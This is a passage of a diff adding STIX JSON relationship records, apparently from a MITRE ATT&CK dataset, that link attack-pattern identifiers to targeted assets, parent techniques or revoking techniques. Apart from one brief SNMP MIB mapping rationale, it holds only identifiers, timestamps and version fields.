"attack-pattern--355be19c-ffc9-46d5-8d50-d6a036c675b6", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b84d0a8f-0486-401e-8214-24259698d9f6", + "created": "2024-06-21T14:12:20.267Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.267Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--348f1eef-964b-4eb6-bb53-69b3dcb0c643", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b84e1473-f370-42ad-ac3b-7caf3c8cd00e", + "created": "2023-09-29T18:42:53.573Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:42:53.573Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e6c31185-8040-4267-83d3-b217b8a92f07", + "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b84e5035-51cf-44f3-943b-e48c1d0dfa7e", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c21d5a77-d422-4a69-acd7-2c53c1faa34b", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b862605b-8ff9-4902-a95c-e13fe44ede03", + "created": "2024-05-23T03:47:50.869Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T03:09:13.076Z", + "description": "Asset Mapping Rationale: Adversaries may target the Management Information Base (MIB) to collect and/or mine valuable information in a network managed using Simple Network Management Protocol (SNMP). ", + "relationship_type": "targets", + "source_ref": "attack-pattern--ee7ff928-801c-4f34-8a99-3df965e581a5", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b8894821-8f07-4385-955a-205f47ffe619", + "created": "2021-03-17T20:32:13.870Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--c071d8c1-3b3a-4f22-9407-ca4e96921069", + "target_ref": "attack-pattern--84771bc3-f6a0-403e-b144-01af70e5fda0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b8ab9c5d-f26c-47b0-a589-eea8e19f7bfc", + "created": "2024-07-02T13:55:55.747Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b8b3943b-e217-4fd9-a3cf-fb675df1ffef", + "created": "2024-06-21T14:12:20.265Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.265Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--10d51417-ee35-4589-b1ff-b6df1c334e8d", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b8bb5b30-604a-4db7-86a4-a9f9701812a8", + "created": "2024-06-27T09:40:38.816Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:40:38.816Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--45241b9e-9bbc-4826-a2cc-78855e51ca09", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b8c6ba4d-1b0e-4d30-a803-09c1951da4de", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--fb640c43-aa6b-431e-a961-a279010424ac", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b8d85cbc-a92e-4921-94bc-defa75becbf3", + "created": "2020-03-23T15:40:51.089Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--327f3cc5-eea1-42d4-a6cd-ed34b7ce8f61", + "target_ref": "attack-pattern--92a78814-b191-47ca-909c-1ccfe3777414", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b94d1f49-e124-4b09-82e7-1053e2456165", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b988166c-4de6-4899-84ae-f423f355e2a0", + "created": "2024-06-21T14:12:20.260Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.260Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--98034fef-d9fb-4667-8dc4-2eab6231724c", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b989ac53-7226-412e-849e-88435ecbca57", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a93494bb-4b80-4ea1-8695-3236a49916fd", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b9963584-393c-4426-9be6-bd992cc15e71", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f3c544dc-673c-4ef3-accb-53229f1ae077", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b9a31bc7-4cd1-4f06-84fb-1bdd88b5dfc2", + "created": "2024-06-21T14:12:20.263Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.263Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d742a578-d70e-4d0e-96a6-02a9c30204e6", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b9a846b8-b7dd-40d4-84b4-bde3d98639d5", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b6075259-dba3-44e9-87c7-e954f37ec0d5", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b9d1c095-fa3f-4377-ac86-3a9361875bf7", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b21c3b2d-02e6-45b1-980b-e69051040839", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b9dcaf7c-023c-4725-8bf3-038185d116b7", + "created": "2024-06-27T09:38:23.838Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:38:23.838Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b9e4890a-7585-4e9f-a4bc-1fefe403f58e", + "created": "2024-06-21T14:12:20.262Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.262Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b7dc639b-24cd-482d-a7f1-8897eda21023", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b9e7ab9b-674e-49be-bf49-4ffc1888eec6", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--29ba5a15-3b7b-4732-b817-65ea8f6468e6", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ba0718f2-cb40-400e-a653-5b53ce49f3f0", + "created": "2024-06-21T14:12:20.271Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.271Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ba2b7a72-5397-46eb-8293-c2cdfa90ef5d", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f63fe421-b1d1-45c0-b8a7-02cd16ff2bed", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ba3a0fee-cbf0-43e2-9895-4834c21b55a6", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--be055942-6e63-49d7-9fa1-9cb7d8a8f3f4", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ba3d8bc0-a418-456c-9b4f-61a040208cf6", + "created": "2020-01-10T16:01:16.205Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--43ba2b05-cf72-4b6c-8243-03a4aba41ee0", + "target_ref": "attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ba42299e-d698-4e83-a122-50a39acdb636", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a01bf75f-00b2-4568-a58f-565ff9bf202b", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ba496af3-2d99-4c2b-8ce0-20388f5d632c", + "created": "2023-09-28T21:28:36.325Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:28:36.325Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387", + "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ba4d0d1b-6f86-4e90-8b42-9ec0fce7bb7b", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7bd9c723-2f78-4309-82c5-47cad406572b", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ba5e1994-4732-44a0-a266-452ca526df5a", + "created": "2020-01-31T12:39:48.360Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--e7eab98d-ae11-4491-bd28-a53ba875865a", + "target_ref": "attack-pattern--a750a9f6-0bde-4bb3-9aae-1e2786e9780c", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ba6a0be7-299c-4704-a24d-e01cbc376de9", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ba7ebe15-15af-4cee-a940-4d9f54f75dad", + "created": "2024-06-27T09:06:18.458Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:06:18.458Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9fa07bef-9c81-421e-a8e5-ad4366c5a925", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ba8b8204-e9e5-4fac-bfd9-61cde17b9fc2", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ae676644-d2d2-41b7-af7e-9bed1b55898c", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ba907c64-092a-4b15-b077-d138bf980b10", + "created": "2024-06-21T14:12:20.275Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.275Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cabe189c-a0e3-4965-a473-dcff00f17213", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ba943eeb-5673-44b5-acbf-1cddc2fefb1a", + "created": "2023-09-28T20:03:54.209Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:03:54.209Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--19a71d1e-6334-4233-8260-b749cae37953", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bab08287-699f-438d-aa69-f72cbac37ba3", + "created": "2020-01-14T17:24:47.560Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--1c338d0f-a65e-4073-a5c1-c06878849f21", + "target_ref": "attack-pattern--b200542e-e877-4395-875b-cf1a44537ca4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bab689ff-c89e-452f-bca6-a01078ae406e", + "created": "2020-01-24T17:07:20.018Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--514ede4c-78b3-4d78-a38b-daddf6217a79", + "target_ref": "attack-pattern--6836813e-8ec8-4375-b459-abb388cb1a35", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--babb4769-baa8-47b9-90e3-3f366ae3dab8", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e6415f09-df0e-48de-9aba-928c902b7549", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--babb602b-6473-4b17-b3f1-ea78a9432282", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ba04e672-da86-4e69-aa15-0eca5db25f43", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bac1f95c-87bf-4939-bc1a-7727aad738f7", + "created": "2023-09-29T18:49:34.208Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:49:34.208Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0fe075d5-beac-4d02-b93e-0f874997db72", + "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": 